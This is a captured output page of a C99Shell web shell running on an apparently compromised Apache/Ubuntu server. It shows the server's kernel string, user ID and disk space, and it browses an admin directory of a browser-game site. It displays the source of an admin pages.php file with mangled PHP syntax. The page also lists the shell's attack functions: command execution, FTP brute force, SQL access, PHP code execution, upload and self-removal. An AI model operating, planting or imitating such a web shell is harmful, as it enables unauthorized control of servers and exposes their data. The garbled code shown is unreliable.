!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/gamesdaddy/cloudarcade/admin/core/   drwxr-xr-x
Free 13.16 GB of 57.97 GB (22.71%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     pages.php (2.84 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<div class="section">
    <ul class="nav nav-tabs">
        <li class="nav-item">
            <a class="nav-link active" data-toggle="tab" href="#pagelist"><?php _e('Pages'?></a>
        </li>
        <li class="nav-item">
            <a class="nav-link" data-toggle="tab" href="#addpage"><?php _e('Add page'?></a>
        </li>
    </ul>
    <!-- Tab panes -->
    <div class="tab-content">
        <div class="tab-pane tab-container active" id="pagelist">
            <table class="table">
                <thead>
                <tr>
                    <th>#</th>
                    <th><?php _e('Title'?></th>
                    <th><?php _e('Created'?></th>
                    <th><?php _e('Slug'?></th>
                    <th><?php _e('URL'?></th>
                    <th><?php _e('Action'?></th>
                </tr>
            </thead>
            <tbody>
                <?php
                $results 
= array();
                
$data Page::getList();
                
$results['pages'] = $data['results'];
                
$results['totalRows'] = $data['totalRows'];
                include(
"part/list-page.php" );
                
?>
            </tbody>
            </table>
            <p><?php _e('%a pages in total.'esc_int($results['totalRows'])) ?></p>
        </div>
        <div class="tab-pane tab-container fade" id="addpage">
            <?php
            $results 
= array();
            
$results['page'] = new Page;
            include(
"part/add-page.php" );
            
?>
        </div>
    </div>
</div>

<!-- Modal -->
<div class="modal fade" id="edit-page" tabindex="-1" role="dialog" aria-labelledby="edit-page-modal-label" aria-hidden="true">
  <div class="modal-dialog" role="document">
    <div class="modal-content">
      <div class="modal-header">
        <h5 class="modal-title" id="edit-page-label"><?php _e('Edit page'?></h5>
        <button type="button" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body">
        <form id="form-editpage">
            <input type="hidden" id="edit-id" name="id" value=""/>
            <input type="hidden" id="edit-createdDate" name="createdDate" value=""/>
            <div class="form-group">
                <label for="title"><?php _e('Page Title'?>:</label>
                <input type="text" class="form-control" id="edit-title" name="title" placeholder="Name of the page" required minlength="3" maxlength="255" value=""/>
            </div>
            <div class="form-group">
                <label for="slug"><?php _e('Page Slug'?>:</label>
                <input type="text" class="form-control" id="edit-slug" name="slug" placeholder="Page url ex: this-is-sample-page" required minlength="3" maxlength="255" value=""/>
            </div>
            <div class="form-group">
                <label for="content"><?php _e('Content'?>:</label>
                <textarea class="form-control" name="content" id="edit-content" rows="12" placeholder="The HTML content of the page" required minlength="3" maxlength="100000"></textarea>
            </div>
            <input type="submit" class="btn btn-primary" value="<?php _e('Save changes'?>" />
            <input type="button" class="btn btn-secondary" data-dismiss="modal" value="<?php _e('Close'?>" />
        </form>
      </div>
    </div>
  </div>
</div>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0058 ]--